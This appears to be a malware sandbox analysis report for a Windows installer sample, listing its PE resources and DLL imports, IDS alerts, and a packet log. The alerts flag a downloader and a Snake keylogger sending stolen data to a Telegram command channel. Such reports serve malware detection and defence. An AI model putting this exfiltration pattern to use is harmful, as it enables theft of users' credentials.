                                                                                                                                  RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                                  RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                                                  RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                  RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                                                  RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                  RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                  RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                                                  RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                                                  RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-19T15:29:23.912768+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549713216.58.208.238443TCP
                                                                                                                                  2024-12-19T15:29:31.912821+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549733132.226.247.7380TCP
                                                                                                                                  2024-12-19T15:29:40.006658+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549733132.226.247.7380TCP
                                                                                                                                  2024-12-19T15:29:42.161159+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549756149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:29:43.850430+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549761132.226.247.7380TCP
                                                                                                                                  2024-12-19T15:29:45.902560+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549766149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:29:49.397276+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549776149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:29:52.938425+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549785149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:29:56.563595+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549796149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:00.031933+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549806149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:08.989401+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549827149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:21.477445+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549859149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:25.990535+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549871149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:30.719693+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549883149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:34.215299+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549893149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:37.686699+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549904149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:42.399185+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549917149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:45.840863+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549925149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:50.316155+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549937149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:53.779170+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549947149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:30:57.250331+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549955149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:31:01.789509+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549967149.154.167.220443TCP
                                                                                                                                  2024-12-19T15:31:07.086493+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549979149.154.167.220443TCP
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 19, 2024 15:29:21.088032007 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:21.088099003 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:21.088181973 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:21.100100040 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:21.100136042 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:22.800245047 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:22.800381899 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:22.801332951 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:22.801399946 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.193308115 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.193345070 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.194279909 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.194359064 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.197119951 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.239351988 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.912681103 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.912779093 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.912844896 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.913000107 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.913325071 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:23.913641930 CET44349713216.58.208.238192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:23.913741112 CET49713443192.168.2.5216.58.208.238
                                                                                                                                  Dec 19, 2024 15:29:24.071151972 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:24.071198940 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:24.071355104 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:24.072251081 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:24.072271109 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:25.777048111 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:25.777350903 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:25.789834023 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:25.789859056 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:25.790260077 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:25.793988943 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:25.794358969 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:25.839334011 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:28.842921019 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:28.843133926 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:28.857830048 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:28.857903957 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:28.962193012 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:28.962285995 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:28.966309071 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:28.966373920 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:28.966399908 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:28.966449976 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.042085886 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.042148113 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.044363976 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.044480085 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.051840067 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.051897049 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.052023888 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.052078009 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.059536934 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.059593916 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.061644077 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.061703920 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.069499016 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.069560051 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.070815086 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.070872068 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.078130960 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.078192949 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.079368114 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.079423904 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.087240934 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.087321997 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.090466976 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.090532064 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.092163086 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.092216015 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.103768110 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.103822947 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.106482983 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.106703043 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.117527962 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.117583990 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.120085955 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.120135069 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.131731033 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.131795883 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.134311914 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.134375095 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.144804955 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.144876957 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.147535086 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.147588015 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.161947012 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.162007093 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.162374020 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.162516117 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.171904087 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.172050953 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.190397024 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.190565109 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.221040964 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.221204996 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.233944893 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.234107971 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.235177040 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.235234976 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.235260963 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.235320091 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.240068913 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.240125895 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.240149975 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.240207911 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.252108097 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.252168894 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.252191067 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.252332926 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.263724089 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.263786077 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.263887882 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.263943911 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.263968945 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.264022112 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.275535107 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.275592089 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.275630951 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.275774956 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.286587954 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.286657095 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.286681890 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.286820889 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.297435999 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.297502995 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.297518969 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.297665119 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.308444977 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.308528900 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.308549881 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.308599949 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.319281101 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.319370985 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.319380999 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.319432020 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.335974932 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.336170912 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.336179018 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.336230040 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.349515915 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.349584103 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.349601030 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.349651098 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.351811886 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.351878881 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.352037907 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.352096081 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.360327959 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.360414028 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.360423088 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.360471964 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.369111061 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.369185925 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.369201899 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.369254112 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.378091097 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.378149986 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.378171921 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.378225088 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.385133028 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.385195971 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.385216951 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.385266066 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.385293007 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.385344982 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.386341095 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.386399031 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.386466026 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.386585951 CET44349720172.217.17.65192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:29.386646032 CET49720443192.168.2.5172.217.17.65
                                                                                                                                  Dec 19, 2024 15:29:29.926505089 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:30.046156883 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:30.046241999 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:30.046780109 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:30.166666985 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:31.375972986 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:31.381685019 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:31.501410961 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:31.858283043 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:31.912821054 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:32.306704044 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:32.306737900 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:32.306813955 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:32.309828997 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:32.309845924 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.539686918 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.539897919 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:33.548127890 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:33.548187017 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.548616886 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.558500051 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:33.599384069 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.979136944 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.979332924 CET44349738104.21.67.152192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:33.979420900 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:34.013520002 CET49738443192.168.2.5104.21.67.152
                                                                                                                                  Dec 19, 2024 15:29:39.514564991 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:39.634181976 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:39.965440035 CET8049733132.226.247.73192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:40.006658077 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:40.112746000 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:40.112834930 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:40.112930059 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:40.113441944 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:40.113481998 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:41.482317924 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:41.482639074 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:41.484297037 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:41.484354973 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:41.484636068 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:41.486027002 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:41.527374029 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:41.527621984 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:41.527678013 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:42.161178112 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:42.161262035 CET44349756149.154.167.220192.168.2.5
                                                                                                                                  Dec 19, 2024 15:29:42.161442995 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:42.162048101 CET49756443192.168.2.5149.154.167.220
                                                                                                                                  Dec 19, 2024 15:29:42.322235107 CET4973380192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:42.323524952 CET4976180192.168.2.5132.226.247.73
                                                                                                                                  Dec 19, 2024 15:29:42.442353964 CET8049733132.226.247.73192.168.2.5
